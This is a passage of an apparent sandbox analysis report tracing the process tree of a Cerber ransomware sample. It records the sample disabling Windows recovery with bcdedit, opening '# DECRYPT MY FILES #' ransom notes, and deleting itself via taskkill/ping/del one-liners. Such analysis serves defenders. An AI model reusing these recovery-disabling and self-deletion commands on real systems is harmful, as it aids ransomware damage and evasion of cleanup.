            "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1868
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1096
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.html
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2868
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2868 CREDAT:275457 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3040
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2868 CREDAT:472065 /prefetch:2
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:484
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
            5⤵
            PID:2556
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
            5⤵
            PID:2772
          • C:\Windows\system32\cmd.exe
            /d /c taskkill /f /im "ReAgentc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe" > NUL
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:2596
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im "ReAgentc.exe"
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:304
            • C:\Windows\system32\PING.EXE
              ping -n 1 127.0.0.1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2688
          • C:\Windows\SysWOW64\cmd.exe
            /d /c taskkill /f /im "db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Local\Temp\db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe" > NUL
            3⤵
            • Deletes itself
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669.exe"
              4⤵
              • Cerber
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2868
            • C:\Windows\SysWOW64\PING.EXE
              ping -n 1 127.0.0.1
              4⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2540
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:2992
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
          2⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3000
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
        1⤵
        • System Location Discovery: System Language Discovery
        PID:2828

      Downloads
